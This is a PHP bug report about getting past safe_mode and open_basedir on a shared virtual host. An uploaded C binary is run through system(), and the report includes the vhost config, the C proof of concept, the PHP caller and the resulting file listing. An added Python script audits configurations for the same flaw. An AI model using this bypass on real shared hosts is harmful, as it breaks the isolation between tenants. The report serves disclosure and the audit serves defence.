ID:               32421
 User updated by:  ricardi at gmail dot com
 Reported By:      ricardi at gmail dot com
 Status:           Bogus
 Bug Type:         Program Execution
 Operating System: *nix (Tested on Linux)
 PHP Version:      4.3.10
 New Comment:

Can't the PHP engine control the children created by the exec
functions? This could be a great security enhancement, since some
PHP applications are suffering from exploits that use this technique. I've
already disabled these functions now, but our clients are unhappy with
this limitation.


Previous Comments:
------------------------------------------------------------------------

[2005-03-23 08:23:53] [EMAIL PROTECTED]

Disable system() and the other exec functions then.
PHP is unable to prevent you from shooting your leg or from formatting the
hard drive with a binary called by a binary.

------------------------------------------------------------------------

[2005-03-23 01:10:23] ricardi at gmail dot com

Description:
------------
We bypassed the safe_mode restrictions using a binary with the "system"
function built in. The problem occurred when we had an incident on a mass
virtualhost machine. One of the domains executed a script that bypassed
the safe_mode restrictions like open_basedir and safe_mode_exec_dir.

The configuration in the virtualhost was like:

<VirtualHost *>
ServerName www.something.com
ServerPath /mnt/nfs/domains/something.com.br/www
php_admin_value open_basedir /mnt/nfs/domains/something.com.br/
php_admin_value upload_tmp_dir /mnt/nfs/domains/something.com.br/
php_admin_value safe_mode_include_dir /mnt/nfs/domains/something.com.br/
php_admin_value safe_mode_exec_dir /mnt/nfs/domains/something.com.br/
...

</VirtualHost>

We created a simple program in C that creates a file outside the
open_basedir and executes a binary that isn't in the
safe_mode_exec_dir:
/* ---------------
   Contents of file.c
   ---------------- */

#include <stdio.h>
#include <stdlib.h>   /* system() is declared here, not in stdio.h */

int main(void) {
        /* the child spawned here is outside PHP's safe_mode checks:
           it writes outside open_basedir and runs a binary that is
           not in safe_mode_exec_dir */
        system("find / -maxdepth 1 > /tmp/trash.txt");
        return 0;
}

Compiling: gcc -o file file.c

With FTP access, we put the file in the safe_mode_exec_dir:

> ls -la mnt/nfs/domains/something.com.br/
-rwxr-xr-x    1 nfsnobod nfsnobod    13576 Mar 22 16:57 file

Now create a PHP script that calls the binary.

<?php
system("file");
?>

Then put this in the webroot and, after accessing the script at
http://www.something.com.br/script.php, check /tmp:

> ls -la /tmp
-rw-r--r--    1 nfsnobody     nfsnobody          139 Mar 22 21:00 trash.txt

We had to disable the execution feature from our product. 
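An added configuration check, not part of this report or of PHP itself, that audits a vhost fragment for the two conditions the report combines: safe_mode_exec_dir lying inside a directory the customer can write to (open_basedir or upload_tmp_dir), and exec functions still enabled. It assumes disable_functions is read from php.ini and passed in as a string; the vhost text is a constructed sample modelled on the one above.

```python
import re

# PHP's safe_mode checks apply only to the PHP exec functions themselves;
# a binary started from safe_mode_exec_dir can spawn anything it likes.
EXEC_FUNCTIONS = ("system", "exec", "passthru", "shell_exec", "popen", "proc_open")

# Constructed sample modelled on the report's vhost: the directory PHP may
# execute binaries from is the same directory the customer can upload to.
SAMPLE_VHOST = """\
<VirtualHost *>
ServerName www.something.com
php_admin_value open_basedir /mnt/nfs/domains/something.com.br/
php_admin_value upload_tmp_dir /mnt/nfs/domains/something.com.br/
php_admin_value safe_mode_exec_dir /mnt/nfs/domains/something.com.br/
</VirtualHost>
"""

def parse_php_values(vhost_text):
    """Collect php_value / php_admin_value directives as {name: value}."""
    pattern = r"^\s*php_(?:admin_)?value\s+(\S+)\s+(.*?)\s*$"
    return {m.group(1): m.group(2) for m in re.finditer(pattern, vhost_text, re.M)}

def _inside(path, root):
    """True if path equals root or is below it (component-wise prefix)."""
    path, root = path.rstrip("/"), root.rstrip("/")
    return path == root or path.startswith(root + "/")

def audit_vhost(vhost_text, disable_functions=""):
    """Return findings for one <VirtualHost>; disable_functions is the php.ini value."""
    values = parse_php_values(vhost_text)
    findings = []
    exec_dir = values.get("safe_mode_exec_dir")
    if exec_dir:
        # open_basedir may list several directories separated by ':'.
        for key in ("open_basedir", "upload_tmp_dir"):
            roots = [r for r in values.get(key, "").split(":") if r]
            if any(_inside(exec_dir, r) for r in roots):
                findings.append(f"safe_mode_exec_dir is inside {key}: "
                                "an uploaded binary can be run via system()")
    disabled = {f.strip() for f in disable_functions.split(",")}
    enabled = [f for f in EXEC_FUNCTIONS if f not in disabled]
    if enabled:
        findings.append("exec functions still enabled: " + ", ".join(enabled))
    return findings

if __name__ == "__main__":
    for finding in audit_vhost(SAMPLE_VHOST):
        print(finding)
```

Running it against the sample reports both writable-directory overlaps and the six enabled exec functions; moving safe_mode_exec_dir to a root-owned directory and setting disable_functions in php.ini clears the findings.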



------------------------------------------------------------------------


-- 
Edit this bug report at http://bugs.php.net/?id=32421&edit=1
